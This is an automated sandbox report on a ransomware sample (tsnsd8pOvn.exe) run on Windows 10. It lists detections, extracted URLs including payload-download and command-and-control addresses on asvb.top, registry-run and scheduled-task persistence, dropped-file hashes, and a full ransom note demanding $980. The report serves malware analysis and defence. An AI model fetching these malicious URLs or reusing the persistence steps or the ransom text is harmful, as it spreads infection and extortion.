        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
        Behavior Graph ID: 1499386, Sample: tsnsd8pOvn.exe, Startdate: 26/08/2024, Architecture: WINDOWS, Score: 100
        Graph nodes: DNS/IP asvb.top (92.246.89.93) and api.2ip.ua (188.114.97.3); processes tsnsd8pOvn.exe and icacls.exe; dropped files include C:\_readme.txt and 78 other malicious files.

        Source | Detection | Scanner | Label | Link
        tsnsd8pOvn.exe | 87% | ReversingLabs | Win32.Trojan.AZORult |
        tsnsd8pOvn.exe | 100% | Avira | HEUR/AGEN.1316832 |
        tsnsd8pOvn.exe | 100% | Joe Sandbox ML | |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | 100% | Avira | HEUR/AGEN.1316832 |
        C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | 100% | Joe Sandbox ML | |
        C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe | 87% | ReversingLabs | Win32.Trojan.AZORult |
        No Antivirus matches
        No Antivirus matches
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        asvb.top | 92.246.89.93 | true | true | | unknown
        api.2ip.ua | 188.114.97.3 | true | false | | unknown

        Name | Malicious | Antivirus Detection | Reputation
        https://api.2ip.ua/geo.json | false | Avira URL Cloud: safe | unknown
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/5.exeYtsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://res.cdn.officXV0100005.log.7.drfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/updatewin2.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://autodiscover.xyz/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
              • Avira URL Cloud: malware
              unknown
              https://autodiscover.com.br/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
              • Avira URL Cloud: malware
              unknown
              https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationV0100005.log.7.drfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/gtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/5.exe)tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://g.live.com/odclientsettings/Enterprisehttps://g.live.com/odclientsettings/MsitFasthttps://g.wct425E.tmp.7.drfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.json-ztsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonmtsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://asvb.top/files/penelop/5.exe0tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/geo.jsonitsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://we.tl/t-TVrnNufMtsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000748000.00000004.00000020.00020000.00000000.sdmptrue
              • Avira URL Cloud: safe
              unknown
              https://g.live.com/1rewlive5skydrive/win81https://g.live.com/1rewlive5skydrive/win8https://g.live.cowct425E.tmp.7.drfalse
              • Avira URL Cloud: safe
              unknown
              https://autodiscover.in/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                unknown
                https://api.2ip.ua/geo.json9tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://asvb.top/files/penelop/5.exe$runwtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://api.2ip.ua/geo.json7tsnsd8pOvn.exe, 0000000B.00000002.2353811966.00000000009A4000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.youtube.com/tsnsd8pOvn.exe, 00000007.00000003.3308505844.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://asvb.top/files/penelop/3.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://autodiscover.online/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                • Avira URL Cloud: safe
                unknown
                https://api.2ip.ua/geo.jsonMtsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmpfalse
                  unknown
                  https://aefd.nelreports.net/api/report?cat=bingrmsV01tmp.log.7.drfalse
                  • URL Reputation: safe
                  unknown
                  https://autodiscover.com.cn/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://autodiscover.it/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                    unknown
                    https://api.2ip.ua/geo.jsonHtsnsd8pOvn.exe, 00000002.00000002.2170674140.0000000000678000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/5.exe$runktsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://api.2ip.ua/geo.jsonGtsnsd8pOvn.exe, 00000002.00000003.2167638377.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000003.2167582038.00000000006F0000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/5.exeruntsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/updatewin1.exe$runtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000810000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://artifacts.dev.azure.com/office/_apis/symbol/symsrv/ui.win32.js.map/d6bb35bc608af2672a5b746baprep_ui_win32_bundle_V8_perf.cache.7.drfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://asvb.top/files/penelop/updatewin2.exerunxtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://autodiscover.com.br/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                      unknown
                      https://api.2ip.ua/geo.jsontem32tsnsd8pOvn.exe, 00000002.00000003.2167638377.00000000006F0000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000003.2167582038.00000000006F0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://asvb.top/nddddhsspen6/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4O6.mtsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://autodiscover.xyz/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                        unknown
                        http://asvb.top/files/penelop/updatewin.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.amazon.com/tsnsd8pOvn.exe, 00000007.00000003.3307957618.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.twitter.com/tsnsd8pOvn.exe, 00000007.00000003.3308366967.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://dc.services.visualstudio.com/v2/trackwct425E.tmp.7.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://asvb.top/files/penelop/3.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://www.openssl.org/support/faq.htmltsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://we.tl/t-TVrnNufMutsnsd8pOvn.exe, 00000007.00000002.3370588549.00000000030B0000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Errortsnsd8pOvn.exe, 00000000.00000002.2147264748.0000000002210000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000005.00000002.2214005303.0000000002200000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000006.00000002.2240840619.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000007.00000002.3368265368.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368242009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000A.00000002.2340871565.0000000002250000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353527786.0000000000400000.00000040.00000400.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000C.00000002.2413430866.00000000021C0000.00000040.00001000.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423749353.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://asvb.top/nddddhsspen6/get.php638Z0tsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=ELV0100005.log.7.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://asvb.top/files/penelop/updatewin1.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        unknown
                        https://api.2ip.ua/geo.json2%tsnsd8pOvn.exe, 0000000D.00000002.2423974600.00000000006E8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://api.2ip.ua/geo.jsonstsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000918000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://autodiscover.online/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                          unknown
                          http://asvb.top/files/penelop/5.exetsnsd8pOvn.exe, 00000007.00000002.3368804894.00000000007B1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://autodiscover.com.cn/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                            unknown
                            https://github.com/react-native-async-storage/async-storage/issuesprep_foundation_win32_bundle_V8_perf.cache.7.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://cacerts.digicerV0100005.log.7.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.nytimes.com/tsnsd8pOvn.exe, 00000007.00000003.3308255641.00000000097D0000.00000004.00001000.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://autodiscover.sg/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                            • Avira URL Cloud: malware
                            unknown
                            https://api.2ip.ua/tsnsd8pOvn.exe, 00000002.00000002.2170674140.00000000006C6000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000003.2250953642.00000000006EB000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 00000008.00000002.3368713688.00000000006D7000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000B.00000002.2353811966.0000000000958000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2423974600.000000000072A000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000003.2423579315.000000000073E000.00000004.00000020.00020000.00000000.sdmp, tsnsd8pOvn.exe, 0000000D.00000002.2424058932.000000000073F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://asvb.top/files/penelop/updatewin1.exerunltsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aefd.nelreports.net/api/report?cat=wsbV01tmp.log.7.drfalse
                            • URL Reputation: safe
                            unknown
                            https://autodiscover.es/Autodiscover/Autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                            • Avira URL Cloud: malware
                            unknown
                            http://asvb.top/nddddhsspen6/gettsnsd8pOvn.exe, 00000008.00000002.3368713688.0000000000726000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            unknown
                            http://asvb.top/files/penelop/updatewin2.exe.xtsnsd8pOvn.exe, 00000007.00000002.3368804894.0000000000769000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://api.2ip.ua/Roottsnsd8pOvn.exe, 0000000D.00000002.2423974600.000000000072A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://autodiscover.es/autodiscover/autodiscover.xmlexcel.exe_Rules.xml.7.drfalse
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
188.114.97.3 | api.2ip.ua | European Union | 13335 | CLOUDFLARENETUS | false
92.246.89.93 | asvb.top | Russian Federation | 49558 | LIVECOMM-ASRespublikanskayastr3k6RU | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1499386
Start date and time: 2024-08-26 23:30:13 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 8m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: tsnsd8pOvn.exe (renamed because original name is a hash value)
Original Sample Name: 04e42207db45792cae0f6d3fd83f0680N.exe
Detection: MAL
Classification: mal100.rans.spre.troj.evad.winEXE@18/733@2/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 30
• Number of non-executed functions: 244
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                              • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                              • Report creation exceeded maximum time and may have missing disassembly code information.
                              • Report size exceeded maximum capacity and may have missing behavior information.
                              • Report size getting too big, too many NtOpenFile calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Report size getting too big, too many NtSetInformationFile calls found.
                              • Report size getting too big, too many NtWriteFile calls found.
                              • VT rate limit hit for: tsnsd8pOvn.exe
Time | Type | Description
17:33:00 | API Interceptor | 1x Sleep call for process: tsnsd8pOvn.exe modified
23:31:09 | Task Scheduler | Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe s>--Task
23:31:12 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
23:31:21 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe" --AutoStart
                              4d847.msiGet hashmaliciousUnknownBrowse
                              • 188.114.97.3
                              danf082024xml.msiGet hashmaliciousUnknownBrowse
                              • 188.114.97.3
                              pdftool-v3.2.1222.0.msiGet hashmaliciousUnknownBrowse
                              • 188.114.97.3
                              SecuriteInfo.com.Win32.Evo-gen.32510.30631.exeGet hashmaliciousGhostRat, Nitol, RamnitBrowse
                              • 188.114.97.3
                              human-verify.b-cdn.net.ps1Get hashmaliciousLummaCBrowse
                              • 188.114.97.3
                              No context
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1104
                              Entropy (8bit):4.893245966380744
                              Encrypted:false
                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWs7mFRqrl3W4kA+GT/kF5M2/kh7HFJhtnZd:WZHfv0p6WsPFWrDGT0f/kRFNZd
                              MD5:6769456FD1CE9C5E1B30A7C4B3D6BC0C
                              SHA1:6B2A667A27CC056CE90AD156B2A71DA4D71A1496
                              SHA-256:92C03AFD5BFE65DB7A98A764CB662B87F1B3D6B3FA1B6CA92A1C92B9725135F0
                              SHA-512:A164F6E0D38B4F54829912E10F7EE66818A9028801B5902B707AC734F111A395F7F35485295497251FBE2E978BBA38556B742178EF7FF68C09D2B822E9BCDA48
                              Malicious:true
                              Reputation:low
                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-TVrnNufMGq..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..helpteam@mail.ch....Reserve e-mail address to co
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):42
                              Entropy (8bit):4.927798970294787
                              Encrypted:false
                              SSDEEP:3:srbxnnGLWbl6:s3xnZU
                              MD5:5EE993D7B7C1C60911F6890687FBAA65
                              SHA1:CDF0318B3FCDC92A337756AA33BF50D15C6CE2A8
                              SHA-256:E6DCAB73EFE0A90DF7570E89855E93F4966BC690BF2CE353F9848F74DBF0CD44
                              SHA-512:874AE27F402BE88C7352ED787799F96F4CE37B84934808BC18BA29B757850174048499B3B21D83079410AF01301C34828DAEA8B572A1CB15C0E8071A395C66C9
                              Malicious:false
                              Reputation:low
                              Preview:3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1..
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):342
                              Entropy (8bit):7.292109597089982
                              Encrypted:false
                              SSDEEP:6:KWARTcbEElxK6oqSdfc+4R93vC9ParW6DNYn3pLr0K0ejVxnZcWcii96Z:NAcbEMxK6mr4fvFrW6Du310Gj3nZxciD
                              MD5:053CC3E212EBEDCD7BFE5969CB88166D
                              SHA1:566A1BA5F5F758873B433F298D59E186236EC47A
                              SHA-256:3F805042C41044F7FC5C1DAE58BF802E8685E4969A3E33803E5F940442D2C6F5
                              SHA-512:C781FE3B11F02EE5296CEE3B8F73FD88EF6B93D0456155A69EB3E26BCCDBB7F728281D83671F6A05FD4B017B4B84D24FBCA3AF8906D54D6809724FCC27235CC8
                              Malicious:false
                              Preview:insec}..eT.....%}.-...J....q......R.Z..jrn...jh....G....7S-.x.<....l-....K.v..5O.d..g....S/|.......z.s.w..(QO&...4..~..4.x...>/...@..Ho..a.+.o..............OL.:..'...f|'....*v...O..26m..B..8...D.b...Q..iA..M{P..L...5..4...k.(..Z..s........E.y...{.q.f|.&3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):629
                              Entropy (8bit):7.596350206208553
                              Encrypted:false
                              SSDEEP:12:kGE9M5AiD0vYwrVGbS9fTPyY6W7ezuC0VhibcO/dneDrnZxcii9a:jE9M5AihoD9f7ybz30ebcaeDrnZxbD
                              MD5:EBCDE706787FD72E7D9015B50C02ED7A
                              SHA1:4D5EACE6414722DDC1C352A870F59944F15166B7
                              SHA-256:DB304460EEC4B9B14F1A6745BF564248E6A5E2CA04A9E165227963955E7FDB96
                              SHA-512:B1EC77D6DC33990BCD249C737F37CFAC7BA392E6364157573FB8D9663AE34784CD9F983B69F754AAE32E85C20E1EBCAD966C23EB404D06E9EBE345806E05169D
                              Malicious:false
                              Preview:2023/...Z.....Q.{sm......2X.2.M.~l..!..l=..S.Q.....8.....|..8.v..ZHw$/X.Yx....>C0....S.:Q.L.&...W..D.q.1...t8|7f.....'....&_#..-.n....'.&..z\..|..7....a..F..<...+:.Y.1T.r@0...y*.27...].W{...h.".#...B..p,.7.tn....X..X....9 e.....l@.".....d.Q..... .X1ru..<.h.......F.....?..I...c...F...:8..e.ols....i..$.....sfp....GN....'.v.....}.\H..C"..Y: {......{..Kx...T..._#.O.f..._.v.X&.ac;..3.&3....r..F.....9f.)..[.R9....1..\..._E....4"...k.,o...|.&.t2..P..].|.'.....?.KF.@...L.$.4a...._D+.II......2E....08.^-5...m:..-zC_.)]1.3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):673
                              Entropy (8bit):7.660527548337968
                              Encrypted:false
                              SSDEEP:12:kwwZ6pDnUjtkOzw3PrilVa47wY5kI8qskleqXDf+Y8h2qoprnZxcii9a:cKnGtzMCHwY5xI1qTf+Y8h27hnZxbD
                              MD5:0756A49BE342D7ECA9B000F4A80277A7
                              SHA1:1FA8A8ACE8C8A897EAAB878886F2ABBFD1E2C64F
                              SHA-256:4746585BF42DFBA35C2B705DA68C67DE197C7C6C1EBA26C85F30AA68451E6072
                              SHA-512:B5A3B9CC88B3417EDAA2310099E758F2D07D6BE8ABD3B423FBD33620791B7E59BBBD989045DFE75B6815E18FE2586D4E34313F46C9668FC8E6E77CD8EA974905
                              Malicious:false
                              Preview:2023/+.fT.....2......P..).....v.'.|..;.<.l.....H. @.7A...&sN......$;w.&...~T.KB.D....l<........Y...j).j..O{5..R.w.`.y?.N..8...p...}X.*f.>."...,.t<F.0..m..LiJ.2.VP....g..F.(.'..|.....t.....A<.Y....e[.e.h.X>.Ng{..i.z.....x.W.t.]...I..W.+.....}. 7Ct...*C..^.....H.O14.,F..6TaR.h.k.X....5kc?......ZU.L....1.. ..{W:.Nm=._._i.....k..#..a..2.*{.q`.S..r&%...<i[..I'..j`.P.......h4.....t..T....].t_........Q......./bB..q...4A.E.p....}.....l..;.qg.%..h.Ga./{I8..%n.....Y......eX..\...M..=....i...R..[.h....._l.1..hxq?.G..{d...v.a.r....L(.d.}.....A[.V29...>.P..^...3..+..'P.3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):818
                              Entropy (8bit):7.769939169544386
                              Encrypted:false
                              SSDEEP:24:YKW1rNFzVYgOwg/itb7MifAERm6ZQnZxbD:YnNrrgCj/mZhD
                              MD5:92B802D922187BDB6B00CE939CEBC36F
                              SHA1:F59954F2524B1C7A13E8B912A8BD79E95F597ED0
                              SHA-256:764929466AA559CBDB764DF2528817E44DCEFB3C2063A9CA6FC522486A2DF5D5
                              SHA-512:245703C9D5D4F7BA19C948D76A44D21EAB69D95CBB1A120E9ACFBE1640CE31B1A9089D0DECF6CE92E1A4B03158B7A6D6CCB623C553D6D1FB5C3EB592CCABBD23
                              Malicious:false
                              Preview:{"os_.u.(..D.B.*`..c.$?..P..{s.:.;.....218'....&Y.wcz}:..g..*._.r...Z.X............g....zun(A.|..k...'zRI..3...9o.Y...o..G(Rc..[:../..4.,ZDM..2...Rco.Y..!W.."..V?......#....d...4E..s0[..4......%...-..J..d_&@;........O.x+.w.,....-.o.....J...|.+..[p.A.Mc.4....}....v.....8..A...4.#N.r..(..;].R.Xi.....I..b....v..y.rM.....VE..`.P8.qi.J.nm..Jm/%.wn...R'.K..W..N.Y....mB..$.VC..4..............5....\3.dK.....5...G...g.9eS.....^...K.)L....y...x-..\..~..?72.F..............-T2..Z.IT..fx...3).D.S..2/:.vr.iO</.xcge#.yZ.m.f...h..f..jD%.q...R=.&.X.7............E..a~.Ns...<..'7AcK}.R+....Mmn;..".L...s..!..-..../A.6w.......@...._.h..>?..O.&..m...O.....~...$o......./.W.m.M .C.!.k[O..M....n[.:..OS.J....-h....3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\AppData\Local\86f7ea96-35da-44f9-9dc4-1881d59cf258\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):5297
                              Entropy (8bit):7.964933006125235
                              Encrypted:false
                              SSDEEP:96:GiZCFCT3OmVFxeT5KzGhG8J9PB3JtEtlSyb67B4q9CQCvTC12TvCTW0hqPVZJ:2MT9FxMEGMy3vWlv67B4WQLCNTW1Vf
                              MD5:4DBB8C31DF45CBD98AEB1DC65D53DC65
                              SHA1:D7E71188E5F2D680170202698A6CB4D53CC1FE0B
                              SHA-256:FB6148A45EBF8A42EB69CF9BE95D052FAE9D5BF0E07311AA28625ED8D1D776E7
                              SHA-512:9D35CB87AA9F5E2AD3C04FDA9D13E1FA8D39F71B56C435711C54BD6E76A209D7BA32E23CD3B3A89E28DDF1FFE1ABBBA4B8112F80C735AFBA7D33EA5B034678B6
                              Malicious:false
